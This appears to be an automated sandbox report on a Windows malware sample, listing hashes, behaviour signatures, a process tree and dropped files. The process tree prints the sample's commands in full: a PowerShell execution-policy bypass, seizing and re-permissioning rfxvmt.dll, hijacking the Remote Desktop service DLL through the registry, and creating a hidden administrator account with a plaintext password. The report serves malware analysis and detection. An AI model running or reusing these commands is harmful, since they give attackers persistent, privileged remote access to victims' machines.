Analysis
-
max time kernel
155s -
max time network
144s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
09-03-2022 15:18
Static task
static1
Behavioral task
behavioral1
Sample
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
Resource
win10v2004-en-20220112
General
-
Target
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe
-
Size
2.2MB
-
MD5
f8c8ebd884d22e0866c217d24c16042f
-
SHA1
0b9a6f2e1d735dae6f979c4bb357b565614b721d
-
SHA256
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba
-
SHA512
3114b0e3984f6d566378a7dcda39ab6f48da57b71462f283e28d94e980b85d93f5a4e84ab74e3a83e90f8f148a768684fd45585fd7844207f448baeb93bc4787
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1776 icacls.exe 1100 icacls.exe 2012 icacls.exe 2028 icacls.exe 1392 icacls.exe 1908 icacls.exe 480 icacls.exe 1764 takeown.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Help\servicedll.dll upx \Windows\Help\lababa.bin upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 392 powershell.exe -
Loads dropped DLL 3 IoCs
Processes:
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exepid process 1180 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe 580 580 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 2012 icacls.exe 2028 icacls.exe 1392 icacls.exe 1908 icacls.exe 480 icacls.exe 1764 takeown.exe 1776 icacls.exe 1100 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\portable.dat powershell.exe File created C:\Windows\help\servicedll.dll powershell.exe File created C:\Windows\help\lababa.bin powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 392 powershell.exe 392 powershell.exe 392 powershell.exe 392 powershell.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
pid process 580 580 580 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 392 powershell.exe Token: SeRestorePrivilege 1100 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.execmd.exewscript.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 1180 wrote to memory of 1556 1180 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe cmd.exe PID 1180 wrote to memory of 1556 1180 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe cmd.exe PID 1180 wrote to memory of 1556 1180 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe cmd.exe PID 1180 wrote to memory of 1556 1180 6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe cmd.exe PID 1556 wrote to memory of 696 1556 cmd.exe wscript.exe PID 1556 wrote to memory of 696 1556 cmd.exe wscript.exe PID 1556 wrote to memory of 696 1556 cmd.exe wscript.exe PID 696 wrote to memory of 1040 696 wscript.exe cmd.exe PID 696 wrote to memory of 1040 696 wscript.exe cmd.exe PID 696 wrote to memory of 1040 696 wscript.exe cmd.exe PID 1040 wrote to memory of 392 1040 cmd.exe powershell.exe PID 1040 wrote to memory of 392 1040 cmd.exe powershell.exe PID 1040 wrote to memory of 392 1040 cmd.exe powershell.exe PID 392 wrote to memory of 1764 392 powershell.exe takeown.exe PID 392 wrote to memory of 1764 392 powershell.exe takeown.exe PID 392 wrote to memory of 1764 392 powershell.exe takeown.exe PID 392 wrote to memory of 1776 392 powershell.exe icacls.exe PID 392 wrote to memory of 1776 392 powershell.exe icacls.exe PID 392 wrote to memory of 1776 392 powershell.exe icacls.exe PID 392 wrote to memory of 1100 392 powershell.exe icacls.exe PID 392 wrote to memory of 1100 392 powershell.exe icacls.exe PID 392 wrote to memory of 1100 392 powershell.exe icacls.exe PID 392 wrote to memory of 2012 392 powershell.exe icacls.exe PID 392 wrote to memory of 2012 392 powershell.exe icacls.exe PID 392 wrote to memory of 2012 392 powershell.exe icacls.exe PID 392 wrote to memory of 2028 392 powershell.exe icacls.exe PID 392 wrote to memory of 2028 392 powershell.exe icacls.exe PID 392 wrote to memory of 2028 392 powershell.exe icacls.exe PID 392 wrote to memory of 1392 392 powershell.exe icacls.exe PID 392 wrote to memory of 1392 392 powershell.exe icacls.exe PID 392 wrote to memory of 1392 392 powershell.exe icacls.exe PID 392 wrote to memory of 1908 392 powershell.exe icacls.exe PID 392 wrote to memory of 1908 392 powershell.exe icacls.exe PID 392 wrote to memory of 1908 392 powershell.exe icacls.exe PID 392 wrote to memory of 480 392 powershell.exe icacls.exe PID 392 wrote to memory of 480 392 powershell.exe icacls.exe PID 392 wrote to memory of 480 392 powershell.exe icacls.exe PID 392 wrote to memory of 1952 392 powershell.exe reg.exe PID 392 wrote to memory of 1952 392 powershell.exe reg.exe PID 392 wrote to memory of 1952 392 powershell.exe reg.exe PID 392 wrote to memory of 912 392 powershell.exe net.exe PID 392 wrote to memory of 912 392 powershell.exe net.exe PID 392 wrote to memory of 912 392 powershell.exe net.exe PID 912 wrote to memory of 1700 912 net.exe net1.exe PID 912 wrote to memory of 1700 912 net.exe net1.exe PID 912 wrote to memory of 1700 912 net.exe net1.exe PID 1636 wrote to memory of 1736 1636 cmd.exe net.exe PID 1636 wrote to memory of 1736 1636 cmd.exe net.exe PID 1636 wrote to memory of 1736 1636 cmd.exe net.exe PID 1736 wrote to memory of 764 1736 net.exe net1.exe PID 1736 wrote to memory of 764 1736 net.exe net1.exe PID 1736 wrote to memory of 764 1736 net.exe net1.exe PID 1072 wrote to memory of 1396 1072 cmd.exe net.exe PID 1072 wrote to memory of 1396 1072 cmd.exe net.exe PID 1072 wrote to memory of 1396 1072 cmd.exe net.exe PID 1396 wrote to memory of 876 1396 net.exe net1.exe PID 1396 wrote to memory of 876 1396 net.exe net1.exe PID 1396 wrote to memory of 876 1396 net.exe net1.exe PID 1556 wrote to memory of 1164 1556 cmd.exe net.exe PID 1556 wrote to memory of 1164 1556 cmd.exe net.exe PID 1556 wrote to memory of 1164 1556 cmd.exe net.exe PID 1164 wrote to memory of 1660 1164 net.exe net1.exe PID 1164 wrote to memory of 1660 1164 net.exe net1.exe PID 1164 wrote to memory of 1660 1164 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe"C:\Users\Admin\AppData\Local\Temp\6fda453aaf860ae8d48167f722685abfe2dbf70ba3145381757f921caf8673ba.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd.exe" /c wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\reactor.txt reactor.ps1& powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps15⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\servicedll.dll /f6⤵
- Modifies registry key
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f6⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc By9zqDdC /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc By9zqDdC /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc By9zqDdC /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QSKGHMYQ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc By9zqDdC1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc By9zqDdC2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc By9zqDdC3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\9887742.txtMD5
f63cb26ded5c82a6c82e5160933da4ed
SHA19ae96ecea3c6c56a6e67e672cf9422d7427c04ff
SHA2567788a48c713d87538bedf7907733b03eb72d3682004b4d1795d0e6eb1b494f4c
SHA512985cbe9af1b9539eb5b67eef4b78bd7581247f3a4b7e4c3ecd6ced3694d9c56814dfd9a866797aa3edeebe68dc07f35513fd62b804d5a0c5699288c9b37adbab
-
C:\Users\Admin\AppData\Local\Temp\changelog_66663.txtMD5
a97cf439052cb972928acb8d809f9edc
SHA12bb935b6b2cf883315eacf3efec2b94bc1054961
SHA2569fed878f994d4778d1ee922ee0c7478cadfb16a119aa93e4e3e8fa555e9d4547
SHA512e861d95e20fd989080349e2257604fde204fda4090fac9d0f2fc413efc7731855a66b0342b902e373908fccb9f85f6777bcf1530d585d6e5bdfdd64e1809c907
-
C:\Users\Admin\AppData\Local\Temp\changes_765543.txtMD5
4a6f27efae09ab64d0735d1c10d79b3e
SHA18d72ddb83235b8b8632e7e9f8df91f566d3c73c6
SHA2560516aa8b986ed03badaf0c7a0db833ab64437900d82a833e22ca4d2715bfc58f
SHA512df1ef0fe044bb6c6e37b07676851cca3b0a849e52e8bfee79e04c0af1d5383862d5e9e17ab5e1c102d31caec84fbf9afa4121c2f89453c21aac8aebd761524b4
-
C:\Users\Admin\AppData\Local\Temp\install_455111.logMD5
0c34e2096fc530535d1fb38b8e9f68a6
SHA1ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
SHA256fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
SHA5120b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf
-
C:\Users\Admin\AppData\Local\Temp\log_455111.txtMD5
2c50ffba8c7d98a9cb5fec3c2a6913df
SHA1849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
SHA256f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
SHA5127d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750
-
C:\Users\Admin\AppData\Local\Temp\reactor.txtMD5
c2a9670c6617c3acc5cc5099b1437e42
SHA16a83468dcaf55f74cd46fdf280ed8f354e6d93eb
SHA256c5b725434a92709e3bf65d44b5cb25712a2140141facb54396e25b29933c7b95
SHA512d2c789f800cae8420b36380155a5d1566b7bed9f2a609b739dee4d20064e7770efd48303000f0ee6aa79340d73b7557223af885ffc78aa32a7c372d04e2903a1
-
C:\Users\Admin\AppData\Local\Temp\reactor.vbsMD5
c0a65d8cb9b5db7fdc9a178f8c80102d
SHA1733f50a72526784a61aaf77e5cddf13f904c1693
SHA256a55d04242cc9381741621d2918accce8fb9c4b8307013c9f828cacdd1d4895c2
SHA51236dc712d8a926c6a7bc4257345261ea0b7154daa97735123007e903cdb732ebf2fe0c3358f00b6b500cdccceecbc130cbc3f4a2a2a4f09974bcca8dc93ed4539
-
C:\Users\Admin\AppData\Local\Temp\readme_455111.txtMD5
c1bf275bca659ad1cf0bd5c6d04cec7a
SHA1122d241329bffafc75d3e1e43e993d22d8180f41
SHA256c6e7c51172f2094e7240c3415681bd3836cf18a6260e184798986787396ed435
SHA5128a5e635ba906248406f392d9dfe9e11c5776d6c349097d641bd672968ea35a360ab7eb5062279307ba7864e44ee18f4dbc11e518a469a592fb8d18fca71baeaf
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\nsyEEB3.tmp\System.dllMD5
fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
\Windows\Help\lababa.binMD5
ffa52c8fbd121f416f27f18bd2d0ad7f
SHA108255a80df87379c303fb39aabc579ef1c09b037
SHA256f61fdfc36ee70147d7639f9d2dc25dd42353652d390961b3727ea990d7ef4b05
SHA512b8db846d9a8bf8561c0f81dea143253d55f4d94543a668eb6fa47a7c86e83845c5734f6a0706a6c9a742cf7fd2dcc971ac01ea223b7270928de4b218da775cb5
-
\Windows\Help\servicedll.dllMD5
def5e867485841d1f2f53db3f0407514
SHA11fdfa582b37f4c0c06a998532856a89581a5fea0
SHA25625de2f4ca48b55ba403b08d94d64e97b5582fa76b51b9ac8e7bcaae111e04dfc
SHA512c470af48a66507dacf5129f0ae7d68df859443e2cb709a507fe6b23be1ff52ca9ded878adcb60997544e9227022d7dbc8bd91b89fa33a30eef8effb1d6dbaf43
-
memory/392-67-0x000000000229B000-0x00000000022BA000-memory.dmpFilesize
124KB
-
memory/392-66-0x000000001B930000-0x000000001BC2F000-memory.dmpFilesize
3.0MB
-
memory/392-61-0x000007FEF2FA0000-0x000007FEF3AFD000-memory.dmpFilesize
11.4MB
-
memory/392-64-0x0000000002292000-0x0000000002294000-memory.dmpFilesize
8KB
-
memory/392-65-0x0000000002294000-0x0000000002297000-memory.dmpFilesize
12KB
-
memory/392-63-0x0000000002290000-0x0000000002292000-memory.dmpFilesize
8KB
-
memory/392-62-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmpFilesize
9.6MB
-
memory/696-58-0x000007FEFBD71000-0x000007FEFBD73000-memory.dmpFilesize
8KB
-
memory/1180-55-0x0000000075831000-0x0000000075833000-memory.dmpFilesize
8KB